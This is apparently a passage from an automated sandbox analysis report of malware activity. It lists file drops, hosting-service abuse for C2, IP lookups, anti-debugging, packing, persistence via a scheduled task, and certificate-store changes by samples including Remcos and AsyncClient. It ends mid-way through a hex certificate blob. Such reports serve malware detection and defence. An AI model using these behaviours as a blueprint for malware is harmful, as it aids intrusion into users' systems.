| File opened (read-only) | \??\S: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\system32\msiexec.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\SysWOW64\msiexec.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\SysWOW64\msiexec.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | bitbucket.org | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Microsoft\\BingWallpaperApp\\WPImages\\\\EmbeddedImage1.jpg" | C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BingWallpaperApp.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
Suspicious use of SetThreadContext
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\Common Files\Wise Installation Wizard\WIS0E7C0CA4E536483D943BE977EA796DD9_1_0_0_182.MSI | C:\Users\Admin\AppData\Local\Temp\a\NEOFreeSetup.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File created | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\graph | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\Wise Installation Wizard\WIS0E7C0CA4E536483D943BE977EA796DD9_1_0_0_182.MSI | C:\Users\Admin\AppData\Local\Temp\a\NEOFreeSetup.exe | N/A |
| File created | C:\Program Files\Windows Media Player\graph\graph.exe | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\graph | C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File opened for modification | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\t5abhIx.exe | N/A |
| File created | C:\Program Files (x86)\Common Files\Wise Installation Wizard\WISFE9FC5BE5BB6414388F43D74DDB259E8_1_2_0_147.MSI | C:\Users\Admin\AppData\Local\Temp\a\TrackYourSentOLSetup.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Common Files\Wise Installation Wizard\WISFE9FC5BE5BB6414388F43D74DDB259E8_1_2_0_147.MSI | C:\Users\Admin\AppData\Local\Temp\a\TrackYourSentOLSetup.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| File created | C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip | C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe | N/A |
| File created | C:\Program Files\Google\Chrome\Application\chrome.exe | C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Installer\MSI97A6.tmp-\Microsoft.Deployment.WindowsInstaller.dll | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File created | C:\Windows\Installer\f79825e.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI97A6.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\f79825c.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI8FF8.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI8FF8.tmp-\Microsoft.Deployment.WindowsInstaller.dll | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI8FF8.tmp-\DispatchQueue.dll | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Windows\Installer\f798259.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\f79825c.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI8A79.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI8FF8.tmp-\CustomAction.config | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\a\ctx.exe | N/A |
| File created | C:\Windows\0E7C0CA4E536483D943BE977EA796DD9.TMP\WiseCustomCalla.dll | C:\Windows\syswow64\MsiExec.exe | N/A |
| File created | C:\Windows\0E7C0CA4E536483D943BE977EA796DD9.TMP\WiseCustomCalla2.dll | C:\Windows\syswow64\MsiExec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI8FF8.tmp-\CustomActions.dll | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI97A6.tmp-\CustomActions.dll | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI97A6.tmp-\CustomAction.config | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI97A6.tmp-\DispatchQueue.dll | C:\Windows\SysWOW64\rundll32.exe | N/A |
| File created | C:\Windows\0E7C0CA4E536483D943BE977EA796DD9.TMP\WiseCustomCalla3.dll | C:\Windows\syswow64\MsiExec.exe | N/A |
| File created | C:\Windows\Installer\f798259.msi | C:\Windows\system32\msiexec.exe | N/A |
Browser Information Discovery
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Embeds OpenSSL
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\system32\netsh.exe | N/A |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\a\888.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BWCStartMSI.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\null.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\888.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\ssg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\Out2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | \??\c:\program files (x86)\internet explorer\iexplore.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\Javvvum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\tester.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BingWallpaperApp.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\neptuno.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BWCUpdater.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\TestExe.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\TrackYourSentOLSetup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\null.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\TPB-1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\in.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\ee29ea508b\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\AsyncClient.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10000880101\ssg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\tester.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\ctx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\NEOFreeSetup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\BWCStartMSI.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\Out2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\Remcos\remcos.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\fcxcx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\random.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\PDFReader.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\cx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a\alexshlu.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
System Network Configuration Discovery: Wi-Fi Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe | N/A |
Modifies Control Panel
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Control Panel\Desktop\TileWallpaper = "0" | C:\Users\Admin\AppData\Local\Microsoft\BingWallpaperApp\BingWallpaperApp.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101f